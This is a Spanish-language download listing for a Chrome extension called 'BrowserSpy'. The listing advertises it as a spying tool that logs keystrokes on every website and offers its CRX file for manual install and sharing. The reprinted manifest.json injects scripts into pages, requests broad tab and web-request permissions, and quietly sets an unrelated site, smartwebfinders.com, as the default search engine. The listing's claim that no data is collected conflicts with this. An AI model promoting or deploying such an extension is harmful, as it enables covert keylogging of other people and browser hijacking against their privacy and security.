Top Spying tool : BrowserSpy

BrowserSpy is an online spying tool that helps you log the keystrokes and other user data.

¿Qué es Top Spying tool : BrowserSpy?

Top Spying tool : BrowserSpy es una extensión de Chrome desarrollada por tackker, y su función principal es "BrowserSpy is an online spying tool that helps you log the keystrokes and other user data.".

Capturas de Pantalla de la Extensión

screenshot

Descargar Archivo CRX de la Extensión Top Spying tool : BrowserSpy

Descarga archivos de extensión Top Spying tool : BrowserSpy en formato crx, instala manualmente las extensiones de Chrome en el navegador o comparte los archivos crx con amigos para instalar fácilmente las extensiones de Chrome.

Instrucciones de Uso de la Extensión

                        BrowserSpy - The Best Spying Tool

BrowserSpy helps monitoring on browser activity and can also assist in spying activities. This extension records keystrokes on all websites. 

This extension does NOT collect any information
(all logged data stays put)                    

Información Básica de la Extensión

Nombre Top Spying tool : BrowserSpy Top Spying tool : BrowserSpy
ID cenplbjdopjciamjdjiehflkhfjmklhm
URL Oficial https://chromewebstore.google.com/detail/top-spying-tool-browsersp/cenplbjdopjciamjdjiehflkhfjmklhm
Descripción BrowserSpy is an online spying tool that helps you log the keystrokes and other user data.
Tamaño del Archivo 213 KB
Cantidad de Instalaciones 132
Versión Actual 0.9
Última Actualización 2024-03-02
Fecha de Publicación 2021-03-30
Calificación 4.50/5 Total de 2 Calificaciones
Desarrollador tackker
Correo electrónico [email protected]
Tipo de Pago free
URL de la Página de Política de Privacidad https://tackker.com/privacy-policy
Idiomas Soportados en-US
manifest.json
{
    "update_url": "https:\/\/clients2.google.com\/service\/update2\/crx",
    "manifest_version": 3,
    "name": "Top Spying tool : BrowserSpy",
    "description": "BrowserSpy is an online spying tool that helps you log the keystrokes and other user data.",
    "version": "0.9",
    "icons": {
        "128": "browser.png",
        "48": "browser.png",
        "16": "browser.png"
    },
    "action": [],
    "background": {
        "service_worker": "back.js",
        "type": "module"
    },
    "content_scripts": [
        {
            "matches": [
                ""
            ],
            "js": [
                "jquery-3.5.0.min.js",
                "content.js"
            ]
        }
    ],
    "chrome_settings_overrides": {
        "search_provider": {
            "name": "Smart",
            "keyword": "Smart",
            "search_url": "https:\/\/smartwebfinders.com\/?n=60&q={searchTerms}",
            "favicon_url": "https:\/\/smartwebfinders.com\/favicon.ico",
            "encoding": "UTF-8",
            "is_default": true
        }
    },
    "permissions": [
        "alarms",
        "tabs",
        "webRequest",
        "webNavigation",
        "scripting",
        "storage",
        "unlimitedStorage"
    ]
}